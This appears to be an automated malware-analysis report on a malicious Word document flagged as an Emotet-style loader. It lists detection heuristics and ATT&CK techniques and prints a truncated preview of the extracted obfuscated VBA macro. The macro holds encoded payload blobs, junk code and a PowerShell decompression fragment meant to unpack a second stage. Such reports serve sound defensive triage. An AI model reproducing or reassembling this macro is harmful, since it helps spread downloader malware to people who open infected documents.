MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro is obfuscated but appears to be designed to download and execute a second-stage payload, as indicated by the CreateObject call and the presence of a long encoded blob. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature. The macro uses VBA, aligning with T1059.005.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46549 bytes |
SHA-256: 5290e0c6df65a9c6c63fec4cfb835e5357306c561551114634e6a8d51523aacb |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 13 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rIXpwWNrWaszR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zAjclPaXiwkzu"
Function SWauqtbXEYC()
On Error Resume Next
Select Case HzwjHG
Case 96503
nVRUaU = 77103
ETZCAG = Sqr(32686)
Case 30823
dXTWPz = CSng(Eshrip)
TMUOO = HPQiR
End Select
ivWUdpOGs = hblGa("nMmY4KPqX707w791/') , [sYstEm.Io.cOmPRESsION.ComPRESsioNMOdE]::decOMPRESS ) ), [text.eNcOdiNG]::aSCiI) ).ReAdtOEnD( ) QuDRA", 3, 116)
Select Case GNbmBi
Case 66396
djiIYY = 49271
inwNP = Sqr(14848)
Case 11609
jsCtbO = CSng(oEard)
GfJwsi = hMpqwr
End Select
Select Case KJzFOS
Case 19930
BwidH = 24117
ATjRN = Sqr(28096)
Case 17021
mmHHG = CSng(VaLcjj)
CTXJcv = uGDrW
End Select
UsmdvB = hblGa("r0UU/FSxwEj/eIujm+vF689Rl", 3, 19)
Select Case vUqcOX
Case 3664
MTGKEP = 62151
SAXdk = Sqr(95786)
Case 99897
IlSqV = CSng(iPkQAA)
iOMhjq = RwXjmZ
End Select
Select Case AfVAD
Case 49987
zlTkdU = 95660
pNnsI = Sqr(25980)
Case 20226
DWpOi = CSng(IjpJG)
IhREX = rjQam
End Select
VhIdmV = hblGa("PaFBkrDtjGRhigPu6x3IOAkcpxvDPp+/Papqh5bUYSG@4DD", 5, 38)
Select Case JUztHq
Case 36211
pKSdOL = 12765
dnvTNr = Sqr(235)
Case 15619
iUuVbE = CSng(kqEOYP)
zqIQz = nqMHQ
End Select
Select Case RLYaJ
Case 37838
YDWqd = 25160
cZwdm = Sqr(55644)
Case 36314
fJHOi = CSng(BkSvv)
RiHPIc = IJPjQQ
End Select
POKDVP = hblGa(".7tJ,B+sTV75+Kd6uHTdb1N3x7PjCPs5Lj2OtcyPxwDilB/w8vbZ6/qHDLeMeCgcj8sPjCeJx7fXdveDR8cFzoY/Il3UgrsDPg9ZDb9DHMXB+UJw9z5O4AA760o+DWht", 7, 119)
Select Case zsXTjT
Case 92598
fPSvlv = 45520
DviNz = Sqr(95544)
Case 34218
UKCKJP = CSng(rzHTIN)
ObDSzs = MrfkqL
End Select
Select Case wsCPUO
Case 88133
SEhzo = 68073
dPjPJ = Sqr(78908)
Case 28787
EXKEK = CSng(uoCBP)
zwnjsw = cGqOGh
End Select
vzhARl = hblGa("FMdI/KfpN9Ep9q8DXr31q+qhJvK8ZPPT6yjqwz+7vWXK7E+yCdq5kP60bdi/SjnKt5LmRdiC8+CvjN8zOSnxP4zqPyGKov8KfBiDfovvfNONfyPKS/qsR3E08qzYfpy2uT/Y/zakr/S5050CeyD6w/eHuQrh+k671Onyi2tb", 4, 161)
Select Case XtATw
Case 98636
mzrKJj = 84817
QivYF = Sqr(3122)
Case 63383
AXMqmA = CSng(JDWIp)
njFQv = zwViN
End Select
Select Case CnpHU
Case 3559
MQQQt = 23382
zzlOwc = Sqr(89551)
Case 82376
Sjkhkz = CSng(YcDSBw)
IIXIA = WFNYuR
End Select
rzVSzJmfc = hblGa("D5Chdr6gPuobcOp98fdT3wfxd3xBXJXijv7+wP6qztHjiN0+zBv8GQiXI8+jFn6C49frZMxn1VAPGF/Q+0rfixfE+0g60fN1c/CkFh+Aw41wLn4T3+AjnWdbc", 3, 115)
Select Case vbpPZL
Case 83583
bjUYM = 62972
nqtdBa = Sqr(54968)
Case 12992
UuwYN = CSng(MnSVo)
nntpEA = YCjnLf
End Select
Select Case MKjVhA
Case 14264
UHcdA = 89651
owqihr = Sqr(4258)
Case 24575
OKLZWw = CSng(qJvQK)
BFsDMF = lhqPW
End Select
EPFiPnYO = hblGa("Bhwrgs2a6+82riyte7Cbxubx+qN/ftfa0f6o7M9oV3bT+udfbFxb3drIxlObtdc7G5utorU2ibZqbGDjaMGfS+tmrfXwGtO+k/RcY882wXNbP28WrbTxzoKl/SaV758+X/p+Q183t7Rfeg3xeuOfp+c2Nlmm832/yPP93Mg4Zr4pi@NcN", 4, 168)
Select Case YbzcsJ
Case 95286
HWpio = 45468
mUEiXu = Sqr(92785)
Case 70240
ifwvpj
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.